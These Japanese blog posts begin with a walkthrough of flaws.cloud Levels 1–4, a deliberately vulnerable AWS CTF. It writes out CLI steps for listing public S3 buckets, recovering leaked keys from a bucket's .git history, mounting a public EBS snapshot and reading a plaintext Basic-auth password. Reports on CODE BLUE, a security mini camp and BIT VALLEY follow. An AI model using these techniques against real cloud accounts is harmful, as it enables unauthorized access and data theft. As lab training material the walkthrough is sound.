とある診断員とSecurity-JAWS #01 参加記録 および flaws.cloudのLevel4までのメモ
はじめに
2019年11月17日(金)に開催された, とある診断員とSecurity-JAWS #01というイベントに参加しました。 このイベントは, AWS固有のセキュリティをCTF形式で学べるhttp://flaws.cloud/を, ハンズオン形式で勉強するイベントでした。
このイベントがなければこのサービスの存在も知らなかった上に, 他の参加者と一緒に問題を解く機会が得られなかったので, いい機会になりました。
ちなみに, ハンズオンで使用された資料は公開されているのでリンクを貼っておきます。
www.slideshare.net
AWSのセキュリティどころか, AWS-CLIツールの使用もままならない状況だったので, 備忘録としてコマンドの使用法およびflaws.cloudの解法を載せていきます。
もくじ
環境
- macOS Mojave version 10.14.6
AWS CLIについて
AWS CLIのcommand referenceは以下にあります。
command referenceは, まずサービス名を選択し, 次にコマンドを選択することでコマンドを一意に特定することができます。
例えば, ec2を選択すると, DescriptionとAvailable Commandsがあり, 使用できるコマンドの一覧が確認できます。そこで, 例としてdescribe-snapshot-attributeを選択すると, Description, Synopsis, Options, Examples, Outputがあり, コマンド自体について情報が確認できます。
ここでコマンドを実行したい場合は, ページ上部にある[ aws . サービス名 ]とSynopsisを連結して使用します。例えば, 先ほどのdescribe-snapshot-attributeで言えば, ページ上部に
[ aws . ec2 ]
の記載があり, Synopsisに
describe-snapshot-attribute --attribute <value> --snapshot-id <value> [--dry-run | --no-dry-run] [--cli-input-json <value>] [--generate-cli-skeleton <value>]
とあるため, $ aws ec2 describe-snapshot-attribute --attribute <value> --snapshot-id <value>というコマンドを実行すれば良いことが分かります。
Level 1
概要
flaws.cloudにアクセスするとLevel 1があります。 書かれていることは以下の通りです。
- 一連のレベルを通してAWSの一般的な間違いと落とし穴を学ぶ
- AWS固有の問題をトピックとしている
- 各問題でヒントが提供される
- 全てが単一のAWSアカウントで実行される
- 全てのチャレンジはflaws.cloudのサブドメインである
- 最初のサブドメインを見つけられるか確認して
解法
まず, flaws.cloudがAWSのどのサービスを利用しているか確認します。これは, 使用しているAWSのサービスに応じて使用するCLIコマンドやURLで使用するために, 調査します。
これは, digやnslookupで調査できます。好きなコマンドを使ってください。
$ dig flaws.cloud +short 52.218.228.218 $ dig -x 52.218.228.218 +short s3-website-us-west-2.amazonaws.com.
正引きでドメイン名flaws.cloudに対応するIPアドレス52.218.228.218を取得し, 逆引きでそのIPアドレスに対応するドメイン名s3-website-us-west-2.amazonaws.com.を取得できました。したがって, awsのs3を使い, regionはus-west-2のAWSサービスを利用していることが分かりました。
この結果を用いて, aws s3のリファレンスを確認し, ページ下部にAvailable Commandsがあります。ここでは, 全体を見るためにlsを使います。
$ aws s3 ls s3://flaws.cloud 2017-03-14 12:00:38 2575 hint1.html 2017-03-03 13:05:17 1707 hint2.html 2017-03-03 13:05:11 1101 hint3.html 2018-07-11 01:47:16 3082 index.html 2018-07-11 01:47:16 15979 logo.png 2017-02-27 10:59:28 46 robots.txt 2017-02-27 10:59:30 1051 secret-dd02c7c.html
ここで, 怪しそうなsecret-dd02c7c.htmlがあるので, ここにアクセスします。
http://flaws.cloud/secret-dd02c7c.html
学べたこと
AWSでは, 静的ファイルのホストに使用するなど, あらゆる種類の権限と機能を備えたS3バケットを設定できます。一方で, 多くの人が非常に緩い権限でそれらのファイルを公開しています。Webサーバのディレクトリ一覧を公開しないように, バケット一覧を公開するべきではありません。
hackeroneのレポートにおける実例
間違いを避けるために
デフォルトでは, S3バケットは作成時にprivateで安全です。
flaws.cloudでは, Webページとしてアクセスできるように,"Static Website Hosting"をOnにして, "s3:GetObject"権限を全員に許可しています。Webページとしてバケットを公開するならば, これで問題ありません。
しかし, flaw(欠陥)を紹介するために, "Everyone"を追加して"List"権限を付与しました。"Everyone"はインターネット上の全員を意味します。全員に対して"List"のアクセス許可があるため, http://flaws.cloud.s3.amazonaws.comにアクセスするだけで一覧を見ることができます。
Level 2
概要
http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloudにアクセスするとLevel 2があります。
書かれていることは以下の通りです。
- 多少ひねっているものの, かなり似ている
- 自分用のAWSアカウントが必要
- 無料利用枠で良い
解法
AWSアカウントが必要なのでAWS CLIに設定します。設定にはaws configureを使います。
セットアップに関しては以下の記事か, google itしてください。
その後, Level 1と同じ流れで解いていきます。 digを使う際に, URLではなくドメイン名を入れる必要があることに注意してください。
$ dig level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud +short 52.218.232.75 $ dig -x 52.218.232.75 +short s3-website-us-west-2.amazonaws.com. $ aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud 2017-02-27 11:02:15 80751 everyone.png 2017-03-03 12:47:17 1433 hint1.html 2017-02-27 11:04:39 1035 hint2.html 2017-02-27 11:02:14 2786 index.html 2017-02-27 11:02:14 26 robots.txt 2017-02-27 11:02:15 1051 secret-e4443fc.html
ここで, 怪しそうなsecret-e4443fc.htmlがあるので, アクセスします。
http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html
学べたこと
"Everyone"へのアクセス権限での公開と同様に, 人は誤って実際にはAWSアカウントを持っている全てのユーザを意味する"Any Authenticated AWS User"へのアクセス権限で公開してしまいます。これは, 自分のアカウントのユーザのみに公開していると誤解しているのかもしれません。
hackeroneのレポートにおける実例
- 認証されたAWSユーザのための公開アクセス権限
間違いを避けるために
特定のAWSユーザに対して公開アクセス権限を付与してください。
Level 3
概要
http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/にアクセスするとLevel 3があります。
書かれていることは以下の通りです。
解法
かなり似ているらしいので今までと同じ流れで解いていきます。
$ dig level3-9afd3927f195e10225021a578e6f78df.flaws.cloud +short
52.218.230.26
$ dig -x 52.218.230.26 +short
s3-website-us-west-2.amazonaws.com.
$ aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
PRE .git/
2017-02-27 09:14:33 123637 authenticated_users.png
2017-02-27 09:14:34 1552 hint1.html
2017-02-27 09:14:34 1426 hint2.html
2017-02-27 09:14:35 1247 hint3.html
2017-02-27 09:14:33 1035 hint4.html
2017-02-27 11:05:16 1703 index.html
2017-02-27 09:14:33 26 robots.txt
robots.txtがあるので中身を見ると, 以下のようになっています。
User-agent: * Disallow: /
MDN web docs Robots.txtによると, 以下のように書かれています。
Robots.txt は通常、ウェブサイトのルートに配置されているファイルです。このファイルは、クローラーからウェブサイトへのアクセスを許可するか、禁止するかを決定します。
したがって, *(任意の)User-agentを許容し, TOP配下の全てのページをブロックしていることが分かります。
次に, .gitを解析します。
解析のために, cpを利用します。
$ aws s3 cp s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud ~/work/ --recursive : 略 $ git branch * master $ git log --oneline b64c8dc (HEAD -> master) Oops, accidentally added something I shouldn't have f52ec03 first commit $ git reset --hard HEAD^ HEAD is now at f52ec03 first commit $ ls access_keys.txt hint2.html index.html authenticated_users.png hint3.html robots.txt hint1.html hint4.html $ cat access_keys.txt access_key AK**(略) secret_access_key Od**(略)
ここで, Access Keyが得られたので登録します。素で$ aws configureを実行すると, 自分のAccess Keyが上書きされてしまうため, --profileオプションを利用したAccess Keyの使い分けを推奨します。また, digコマンドの結果でわかっているように, regionはus-west-2なので, それに倣ってus-west-2にします。
$ aws configure --profile level3 AWS Access Key ID [None]: AK**(略) AWS Secret Access Key [None]: Od**(略) Default region name [None]: us-west-2 Default output format [None]: json
その後, このaccess_keyを用いて中身を確認します。 保持しているバケットの一覧はlsで確認できます。
$ aws s3 ls --profile level3 2017-02-19 04:41:52 2f4e53154c0a7fd086a04a12a452c2a4caed8da0.flaws.cloud 2017-05-30 01:34:53 config-bucket-975426262029 2018-07-08 01:09:49 flaws-logs 2017-02-19 04:40:54 flaws.cloud 2017-02-24 14:15:42 level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud 2017-02-27 03:29:03 level3-9afd3927f195e10225021a578e6f78df.flaws.cloud 2017-02-27 03:49:31 level4-1156739cfb264ced6de514971a4bef68.flaws.cloud 2017-02-27 04:49:03 level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud 2017-02-27 04:48:40 level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud 2017-02-27 05:07:13 theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud
ここで, level4-から始まるドメイン名があるので, このドメイン名にアクセスします。
学べたこと
人はしばしばAWS Keyを漏洩し, Keyを取り消さずにミスを隠蔽しようとします。不適切な配置や漏洩した可能性がある任意のAWS Key(もしくはSecrets)を, あなたは常に無効にするべきです。Secretsに対して素早く, そして頻繁に権限を与えて直してください。
また, AWSの特定のバケットのみを一覧表示に含めないという制限はできません。そのため, いくつかのバケットを一覧表示する権限をとある人に与えたとすると, その人は全てのバケットを一覧表示することができます。バケットの中に何があるかは分かりませんが, バケットが存在することが分かります。
同様に, バケットは全ての顧客に対して一意でなくてはならないglobal namespaceを使用することに注意してください。したがって, もしmerger_with_company_Yといった秘密と思われる何かの名前のバケットを作成すると, そのバケットの存在を技術的に発見する可能性があります。
実例とケーススタディ
間違いを避けるために
もし誤って侵入, 保存, 共有, publicにされたと考えられる場合, 必ずSecretの権限を割り当て直してください。
Level 4
概要
http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/にアクセスするとLevel4があります。
書かれていることは以下の通りです。
- 次のレベルのために
4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloudのEC2上で動いているWebページにアクセスする必要がある - nginxがセットアップされたすぐ後に, EC2のスナップショットが作成されたことを知っておくと役立つ
解法
4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloudにアクセスするとログインを求められます。Response HeaderのWWW-Authenticateを見るとBasic realm="Restricted Content"とあるため, これはBasic認証であることとnginxでserveされていることがわかります。
ここで, 問題文にあるnginxがセットアップされたすぐ後に, EC2のスナップショットが作成されたことを知っておくと役立つとのヒントから, EC2のスナップショットを得たいという発想になります。
aws ec2のAvailable Commandsを見ると, describe-snapshotsがあります。単純にコマンドを実行すると膨大な量のスナップショットが表示されたため, スナップショットに紐づけられているOwnerIdの数を確認しました。
$ aws ec2 describe-snapshots --profile level3 | grep "OwnerId" | wc -l 21541
これだけあってはスナッップショットを特定するのは難しいです。そこで, OwnerIdを指定することでスナップショットを特定します。OwnerIdはaws sts get-caller-identityで取得できます。このコマンドでは, userID, AWSのaccountID, ARN(AWS Resource Name)を取得できます。
$ aws sts get-caller-identity --profile level3
{
"UserId": "AI**LC",
"Account": "97**29",
"Arn": "arn:aws:iam::97**29:user/backup"
}
取得したAcountIDを用いて, スナップショットを取得します。
$ aws ec2 describe-snapshots --owner-id 97**29 --profile level3
{
"Snapshots": [
{
"Description": "",
"Encrypted": false,
"OwnerId": "97**29",
"Progress": "100%",
"SnapshotId": "snap-0b**89",
"StartTime": "20**0Z",
"State": "completed",
"VolumeId": "vol-04*50",
"VolumeSize": 8,
"Tags": [
{
"Key": "Name",
"Value": "fl**27"
}
]
}
]
}
SnapshotIdを取得できたので, パーミッションを確認します。パーミッションはaws . ec2 describe-snapshot-attributeで取得できます。
$ aws ec2 describe-snapshot-attribute --snapshot-id snap-0b**89 --attribute createVolumePermission --profile level3
{
"CreateVolumePermissions": [
{
"Group": "all"
}
],
"SnapshotId": "snap-0b49342abd1bdcb89"
}
Permissionは"Group": "all"なので, 自分のアカウントにスナップショットを作成します。
aws ec2 create-volume --availability-zone us-west-2b --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
{
"AvailabilityZone": "us-west-2b",
"CreateTime": "2019-12-17T05:23:09.000Z",
"Encrypted": false,
"Size": 8,
"SnapshotId": "snap-0b**89",
"State": "creating",
"VolumeId": "vol-07**c5",
"Iops": 100,
"Tags": [],
"VolumeType": "gp2"
}
この作成したインスタンスにesbをアタッチしてmountします。マウントした中身を見ると, setupNginx.shで.htpasswdに書き込みをしているようです。
ubuntu@ip-***-**-**-**:~$ cat /mnt/home/ubuntu/setupNginx.sh htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
htpasswd -c -b /etc/httpd/conf/.htpasswd ユーザ名 パスワードの形式なので, 以下のように情報を抜き取れる
- ref: Basic認証設定
- user: flaws
- pass: nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M
を入力してクリア。
学べたこと
AWSはEC2とデータベース(RDS)のスナップショットを作成できます。主な目的はバックアップを作成することですが, パスワードを忘れたとき人所有しているEC2にアクセスできるようにすることがあります。これは, 攻撃者に対しても同様です。
スナップショットは通常所有しているアカウントに生げんっされているため, 攻撃者はAWSキーにアクセスしてEC2の開始/停止等を行い, それを使用してEC2のスナップショットを作成して起動します。
おわりに
Level 5-6も終わっているのですが, 記事にする時間がなかったので今度更新します。冒頭で紹介した通り, 本イベントで使用された資料は公開されているので, flaws.cloudにチャレンジしてみてはいかがでしょうか?
CODE BLUE 2019 @TOKYO 学生スタッフ 参加記録
こんにちは。task4233(@task4233)です。
2019年10月29日-30日の2日間, ベルサール渋谷ガーデンで開催されたCODE BLUE 2019 @TOKYOに学生スタッフとして参加しました。 そこで, 来年以降参加される方をメインの対象として以下の3点を共有するために本記事を投稿します。
- 本カンファレンスの概要
- 学生スタッフの概要
- 学生スタッフとしてお手伝いした感想
もくじ
CODE BLUEとは
公式のWebページによると, 以下のように書かれています。
CODE BLUEとは、世界トップクラスの情報セキュリティ専門家による最先端の講演と、国や言語の垣根を越えた情報交換・交流の機会を提供する国際会議です。
Talks(講演)では, 世界中から招へいされたセキュリティの専門家が講演をします。大半の講演が英語ですが, 同時通訳の日本語音声*1が無料で利用できます。講演では実際にデモとしてexploitする講演もありました。
本カンファレンスでは, Talks(講演)のみならず, オープンソースツールやプロジェクトを紹介するBluebox, CTF, Hardware Soldering VillageやCapture The PacketといったWorkshopも催されていました。
学生スタッフとは
学生スタッフは公式のTwitterで, 以下のような文面でスタッフを募集していました。。
日交代で聴講したり、トップクラスのスピーカーに質問したり、企業で働く方々に直接話を聞いてリアルを学んだり、全国各地から来る学生と友だちになる、貴重な機会になるはず!
お手伝いするのは, 準備日の会場設営, 1日目もしくは2日目に割り当てられた業務およびカンファレンス終了後の片付けになります。 私が割り当てられた業務は同時通訳レシーバの貸し出し, 回収および清掃でした。
他の業務の役割はこの方の記事で説明されていたので共有します。
学生スタッフは業務が割り当てられていない間ならば自由にカンファレンスを楽しむことができます。私は1日目に業務が割り当てられたので, 2日目は講演を拝聴したりWorkshopに参加したりしました。
学生スタッフとしてお手伝いした感想
一言で言うと, 楽しめました。
実は, 学生スタッフの統括を行った方々が再三再四おっしゃっていたことがありました。 それは「楽しみましょう」という言葉でした。 「楽しむ」と聞いて何を想像するでしょうか?
日本国語大辞典で「楽しむ」の意味を調べると, 以下のような意味がありました。
- …の中に、あるいはその状態において、心の満足を感じる。
- ある持続的な行為によって、心を快適にする。また、満足しながら、ある行為をする。
- 将来に期待をかけることによって、心を希望で満たす
うまく言語化されているなと感じました。2単語を抜き出すとすれば, 「満足」と「希望」です。
これらの観点で言えば, 今回はかなり楽しめました。 なぜなら, 私の業務はMain Track会場内で完結する業務で, 併せて講演を拝聴できたためです。多少はメモを取ることもできたのでラッキーでした。また, 休憩室で数人のスピーカーとお話もできたのも学生スタッフで参加しなければ経験できなかったことなので満足しています。
また, 休憩中に学生スタッフ同士で話すことで, 初対面の人とは新しいコネクションを作り, 既に知り合っていた人とは更に深いコネクションを作ることもできました。特に, 普段のイベントでは話せないような, CODE BLUE CTFを運営したCTFチームのメンバーや会社のCTO*2といった, 普段のイベントでは話せないような方々と話せたので, またとない良い機会でした。イベントでは意外と英語が通じたのも少し自信に繋がりました。こういったコネクションが今後の活動で役に立つやもしれません。その点で言えば希望もあると言えるのではないでしょうか?*3
おわりに
以上が参加記録になります。
今回の学生スタッフを振り返ると, 直後だからか, 楽しかったという思いが強く残っています。 そのため, 関係者の皆様には感謝しかありません。
また, 講演は私の知識不足で完全に理解できている講演は殆どないと感じています。そのため, 今後はCODE BLUEのレポートに少しずつ目を通すつもりです。 レポートはTwitterのタグ#codeblue_jpや以下のリンク先を参照してください。このリンクは気づき次第更新するつもりです。
兎にも角にも, CODE BLUEは非常に楽しめたカンファレンスでした。来年度も縁があって参加できるようならば, スピーカーアテンドに挑戦するつもりです。 来年度も開催されると思うので, ぜひ参加してみてはいかがでしょうか?
セキュリティ・ミニキャンプ in 山梨 2019 参加記
TL;DR
- ミニキャンプの概要共有
- ミニキャンプで得られた情報の整理
もくじ
はじめに
2019年9月29日(日)に開催されたセキュリティ・ミニキャンプ in 山梨 2019に参加しました。この記事の目的は, ミニキャンプの概要を共有することとミニキャンプ中に学んだことを私なりにまとめて共有することです。
大学の講義や教職課程の介護等体験などで忙しく, 公開までに2週間ほど経ってしまいましたが, なんとか公開できてよかったです。
セキュリティ・ミニキャンプとは
IPAによると以下のように書かれています。
全国における情報セキュリティ人材の早期発掘と育成を目的に、各地で専門講義を実施しています。全国大会と比較して、期間が1日程度と短いことから「ミニキャンプ」とも称しています。対象は25歳以下の学生で、参加するには、応募課題を提出し、合格する必要があります。
期間は1日と短いですが, 内容は一般的な講義と比較して濃かったです。
詳しくは, 以下のリンクを参照してください。
専門講座: ミニキャン言語を作ってみよう!
講座概要
自作言語であるMC言語を実装する講座でした。 この言語は, フロントエンドでLLVM IRを出力するC++コードを採用し, バックエンドにLLVMを利用しています。
このおかげで, 私たち人間はC++コードを書くだけで, 最適化まで行われた実行形式のバイナリを入手することができます。
基本的に実装は事前課題*1で行い, 本講義では実装した部分の解説と実装を行いました。
講座前に行ったこと
3回分の事前課題
第1回課題はコメント+参考コード付き, 第2,3回課題はコメントのみ, 発展課題はノーヒントでした。 書く課題はYuka TakahashiさんのGitHubで公開されています。以下にリンクを置いておくので興味があれば参照してください。
- GitHub - yamaguchi1024/mc-lang-1: セキュリティミニキャンプ2019山梨 MC言語講義
- GitHub - yamaguchi1024/mc-lang-2: セキュリティミニキャンプ2019山梨 MC言語講義 第二回事前課題
- GitHub - yamaguchi1024/mc-lang-3: セキュリティミニキャンプ2019山梨 MC言語講義 第三回事前課題
発展課題: 演算子の追加実装
<=や>=といった演算子等を追加で実装しました。
>=と<=の実装が出来ました!
— Tasker (@task4233) September 19, 2019
Enumを使ってこなかったので知らなかったが, Enumはかなり便利だった。 pic.twitter.com/WlzR8I6yH6
言語実装では, 演算子の優先度を規定する必要があります。 例えば, C++では以下のように演算子の優先度が規定されています。
MC言語では, std::map< char, int >で, keyを演算子, valueを優先度として定義していました。しかし, >=や<=では2文字必要であるため, std::map< char, int >ではこれらの演算子の優先度を格納出来ませんでした。
そのため, これらの値をenum型で新たに定義することで, 2文字以上の演算子も定義することが出来ました。
制作過程はこちらのPullRequestを参照してください。
三項演算子の実装
三項演算子?を実装しました。
三項演算子を実装できました!
— Tasker (@task4233) September 28, 2019
左側がmc言語で書いた再帰版gcdのコードです。
右側の一番下で,
gcd(831, 3601) = 277が正しく計算できているのが分かると思います。
他に追加すると面白い機能ってなんだろうか。 https://t.co/o1b4LqyRqV pic.twitter.com/daIcCPVoUo
文法は, condition ? expression1 : expression2です。conditionがtrueならexpression1が評価され, falseならexpression2が評価されます。
一般的にコンパイラの読み取りは一方通行なので, 解析時にどのようにすればASTを構築できるかを考えるのに苦労しました。
講座で得られたこと
得られた知見はツイッターで適宜呟いていたので, 抜粋してコメントしていきます。
Google Summer of Code
Google Summer of Codehttps://t.co/qKMpskxqPh
— Tasker (@task4233) September 29, 2019
Google Summer of Codeとは, 公式サイトによると, より多くの学生がOSS開発に取り込むことに焦点を当てたグローバルプログラムで, OSS組織と協力して3ヶ月間続けるプロジェクトです。Yuka Takahashiさんは積極性と英語力があれば行けるでしょうと仰っていました。
UNIX初心者におすすめの本
はじめてUNIXで仕事をする人が読む本https://t.co/ZquKOrShic #seccamp
— Tasker (@task4233) September 29, 2019
チューターの方が「UNIXに初めて触れるならこの本がおすすめ」と仰っていました。
puts vs printf
putsはprintfよりも速い。
— Tasker (@task4233) September 29, 2019
知らなかった。https://t.co/gmn7oXxCCJ#seccamp
putsはprintfよりも速いようです。誤差なので気にするようなことではないと思いますが, 何度も出力する際はputsを使用した方が良いと思います。
C++における正規表現
C++11における正規表現はstd::regex_match()が使用できる。https://t.co/yPR5YtfG1n
— Tasker (@task4233) September 29, 2019
これも知らなかった。#seccamp
参加者の中でパターンマッチを利用している方がいらっしゃいました*2。C++でも出来ないことはないだろうと考えていましたが, 実際にあることを確認していなかったためいい機会になりました。
専門講座: OSの力を借りずに起動するアプリを作ろう
講座概要
UEFIアプリケーションを作成して, QEMU*3上で動かす講座でした。 Qiitaの記事によると, UEFIは以下のように説明されています。
UEFIとは、一言で言うと「最近のPCやサーバーに入っている、新しくて高機能なファームウェア(及びそのインターフェースの仕様)」です。
したがって, 本講座のタイトルにもある「OSの力を借りずに」というのは, 「OSの力を借りずに, UEFIアプリケーションをUEFIの力を借りて 起動するアプリを作ろう」のことだと解釈しています。*4
実装は, EDK IIを用いて行いました。
os-devによると, EDKⅡは以下のように説明されています。
EDK II は元々、UEFI の開発に深くかかわっている Intel が作っていた SDK です。gnu-efi が「UEFI アプリケーション」専用なのに対し、EDK II は UEFI アプリはもちろん、周辺のライブラリや、UEFI ファームウェアそのものを開発するための SDK という役割も持っており、超高機能です。高機能ゆえに UEFI アプリを作るという目的のためには複雑すぎてとっつきにくい印象があります。が、フル装備の SDK ですから、慣れておけば後々困ることもないと思います。
講座前に行ったこと
いくつかの機能を実装しました。 具体的に実装した機能は以下の通りです。
EDK IIを用いたハローワールドアプリの作成(事前課題)
EDK IIを用いてUEFIアプリケーションを作成しました。 EDK II で UEFI アプリケーションを作るを参考に作成しました。
アプリケーションのメモリマップをファイルに保存する(事前課題)
ここでやるべきことは2つです。 1つ目はアプリケーションのメモリマップを取得すること, 2つ目はファイルにその情報を保存することです。
まず, アプリケーションのメモリマップを取得するためには, EFI_BOOT_SERVICE.GetMemoryMap()を用います。このメソッドは, アプリケーションのメモリをマッピングしたものを読み取ることが出来ます。このメソッドの詳細は, UEFI Specificationの7.2 Memory Allocation Servicesを参照してください。
次に, ファイルにその情報を保存するためには, EFI_FILE_PROTOCOLおよびそれに関連するメソッドを利用します。これらのメソッドの詳細は, UEFI Specificationの13.5 File Protocolを参照してください。
MC言語で定義した関数が出力した値をPrint関数を用いて画面に出力(発展課題)
ミニキャン言語でフィボナッチ数列を実装できた! pic.twitter.com/BFYgEopr6L
— Tasker (@task4233) September 21, 2019
シェルもどきを作る(趣味)
edk Ⅱ上のUEFIアプリケーションで動くシェルもどきが出来ました!
— Tasker (@task4233) September 23, 2019
「すごい、ちゃんと動いてますね!」
コマンド入力は, #OS_Girls 2を参考にして実装しました。 https://t.co/o1S5t7xBPr pic.twitter.com/Bl948JdPmU
OS_Girls 2を参考にI/Oを実装しました。
講座で得られたこと
最も大きかったのは, ポインタとアドレスの理解が深まったことだと考えています。元々, ポインタとアドレス自体はある程度理解していたのですが, 今回のミニキャンプを経て更に理解が深まりました。特に, Cのコードをアセンブリに変換して考える部分が最もしっくりきた部分でした。
おわりに
以上が参加記録になります。
今回のミニキャンプを振り返ると, 参加者が主体となって構成されているイベントだと強く感じました。一般的なイベントでは, 公演の拝聴やハンズオンはあれど, 基本的に主体はイベントを開催している側でした。しかし, ミニキャンプでは参加者が何かをしたいと言えば, それを講師やチューターの方が一緒に解決してくださるという内容だったと記憶しています。
その点で, ミニキャンプは参加者が中心となって何かができるイベントと言えるのではないでしょうか?
このミニキャンプは他の場所でも開催されています。興味のある方は, ぜひ参加してみてはいかがでしょうか?
BIT VALLEY 2019で印象に残った3つのセッションとその感想
はじめに
BIT VALLEY 2019に参加しました。この記事では, 私が印象に残った3つのセッションを紹介します。私は後半の1日しか参加していないため, 2日目のセッションについてのみ書きます。
また, この記事は私なりに咀嚼した概要です。そのため, 誤った捉え方をしている部分があれば訂正をお願いします。
もくじ
- はじめに
- もくじ
- BIT VALLEYとは
- 「よい」だけでは足りない! –世界に飛び出していくために必要なマインドセット–
- クラウド時代のエンジニア生存戦略
- 世界中の開発者と共にモノづくりをするために必要な6つのこと
- 全体を通して
- おわりに
BIT VALLEYとは
2019年09月13日(金)〜09月14日(土)にかけて開催されたカンファレンスイベントです。ホームページには以下のように書かれています。
「BIT VALLEY 2019」は、技術だけでは成しえない、人の感性に訴え、共感を呼ぶサービスを創造するために必要な、気づきを得られるカンファレンスイベントです。
要するに, 「なに」で創造するかではなく 「どのように」創造するかに焦点をあてたカンファレンスイベント です。
「よい」だけでは足りない! –世界に飛び出していくために必要なマインドセット–
スピーカーは澤 円(@madoka510)さんでした。
マインドセット更新の必要性
世界に存在する全データのうち, 90%が直近2年で生まれたデータ です。これほど頻繁に変わるデータに対応するために, 私たちもマインドセットを更新する必要があります。
「よい」は変化する
「よい」という言葉があります。一昔前は, 品質の高いモノが「よい」モノとされていました。実際に, 日本はそのおかげで高いマーケットシェアを誇っていました。しかし, 今は違います。高品質でも価格が高いモノは今のマーケットニーズに反しているためです。したがって, 過去の「よい」考え方だけでは, イノベーションは生まれません。
「知識・経験」×「スピード」のマトリクスによる人の分類
では, どのような人になるべきなのでしょうか?それを理解するために, 人を「知識・経験」と「スピード」の2軸で分類します。すると, 以下のようになります。
左上から反時計回りに見ていきます。
「賢いが遅い」人は, 組織の成長を阻害します。いわゆる「口だけの人」です。日本に多いタイプのようです。
「愚かで遅い」人は, 組織を停滞させます。いわゆる「どうしようもないノロマ」です。
「愚かで速い」人は, 変化への対応に弱いです。いわゆる「タスクワーカー」です。単純作業がメインなので, 技術革新によって消えていく可能性が高いです。また, 他の場所に移動しづらいのも特徴です。
したがって, 「賢くて速い」人が狙い目です。
「賢くて速い」人になるためには
「賢くて速い」人になるためには, あなたが「どうありたいか(being)」を考えてください。 人は, 「どうありたいか(being)」よりも「何をすべきか(doing)」を考えがちです。
#bitvalley2019
— Tasker (@task4233) September 14, 2019
人は「どうありたいか(being)」よりも「何をすべきか(doing)」を考えがち
「どうありたいか(being)」を考える過程で重要なことが3つあります。
1つ目は, 押し付けられている価値観を取り払うこと です。最も簡単なやり方は, 「新しく何をやるか」ではなく 「新しく何をやめるか」 を考えることです。
2つ目は, どんどんアウトプットすること です。アウトプットによって得られるフィードバックは高品質なインプットに繋がります。アウトプットのやり方に困ったら, 質問をしてください 。
アウトプットのやり方に困ったらまずは質問を。#bitvalley2019
— Tasker (@task4233) September 14, 2019
質問は, 自分向けにカスタマイズされた情報を得られる立派なアウトプットです。
3つ目は, もっと心を自由にすること です。人生は1回きりです。1日は等しく24時間です。 嫌ならやめましょう。
感想
最も印象に残っているのは,
人は「どうありたいか(being)」よりも「何をすべきか(doing)」を考えがち
という部分です。私は 「〜をする」という小目標を立てていた時期があったので刺さりました。その時は日を跨ぐにつれ停滞していったことをよく覚えています。これは, 「どうありたいか(being)」よりも「何をすべきか(doing)」を考えすぎた結果だなと感じました。
クラウド時代のエンジニア生存戦略
スピーカーは高橋 慎一さんでした。
www.slideshare.net
エンジニア編(習慣づくり)とプレイングマネージャ編(現場づくり)の2部構成です。
エンジニア編(習慣づくり)
エンジニアの習慣づくりに重要なことは4つあります。
1. キャリアパスを見据えること
言い換えれば, 市場が求める人材を理解することです。
では,今クラウド業界で必要とされている人材はどのような人材でしょうか?その答えは, 複数の分野がある程度出来て, かつ尖った部分を2・3個持っている人材 です。
例えば, AWSでは100を優に超える膨大なサービスが提供されています。そのため, その一部しか使いこなせないΠ型の人*1は市場が求める人材とは言えません。したがって, クラウド業界では, より一層複数の分野に知見を養う必要があります。
2. インプットを大事にすること
アウトプットをするためには, インプットが必要不可欠です。ただし, 継続することが重要なので, インプットは無理のないボリュームで行ってください。例えば, はてブ*2タイトルの流し読みや本屋に足を運ぶことが手軽で良いでしょう。
3. 目標設定を心がけること
2〜3年単位の長期目標から逆算して, 1年単位の中期目標や2〜3ヶ月単位の短期目標を設定してください。ただし, 各目標で見据えるものは異なります。
具体的に, 長期目標は 自分が望むキャリア変化を見据えて設定してください。 中期目標は, そのキャリア変化をもたらすための環境変化を見据えて設定してください。 短期目標はその環境変化をもたらすためのスキル変化を見据えて設定してください。そうすることで, ブレない技術習得サイクルを築くことが出来ます。
ここで, 長期目標と関連のないことを短期目標に設定しないでください。例えば, カレーの作り方を考えている時に, ポン酢を作れる必要はないですよね。
4. 小さな成功体験を作ること
無作為にあなたを含めた100人を抽出したとき, あなたが一番だと誇れるものはありますか? そこで誇れるような成功体験を作ってください 。
小さなことでも他分野のことでも問題ありません。重要なのは, 1つでも成功体験があることです。なぜなら, 1つでも成功体験がある人は次に繋がりやすいためです。その結果, セルフイメージが高く, 成功癖がついた人になっていきます。
プレイングマネージャ編(現場づくり)
プレイングマネージャとは, この記事に以下のように書かれています。
プレイングマネージャーとは、現場の最前線で売上や利益に貢献する実務を担当する一方、部下の育成や指導を行う管理職を兼任する人物を指します。
いわゆる, 中間管理職です。このプレイングマネージャの現場づくりに重要なことは3つあります。
1. 「できない理由」を探さないこと
「できる理由」を考えてください 。人はやる前から, 無意識のうちに前提条件を作りがちです。そのために, あなた自身を含む従業員で「どうやったらできるか」の思考訓練*3を積んでください。
2. 挑戦できる環境を作ること
メンバーが業務中にスキルアップ可能な「挑戦できる環境」を作ってください 。クラウド業界は早い段階で小さな失敗を繰り返せる挑戦にはもってこいの環境です。そのため, 常に挑戦できる環境づくりをしてください。例えば, プロジェクトごとで別の言語を使用したり, マネージャ自ら挑戦する姿勢を見せたりといった働きかけができます。
3. 視座を下げて考えること
相手(部下)の立場に立った時に, 自分がどう見えるかを適切に振り返る機会を作ってください。考える際に相手の興味・関心を意識するとよいです。
クラウド時代を生き抜くために
以上7つがクラウド時代に重要なことです。
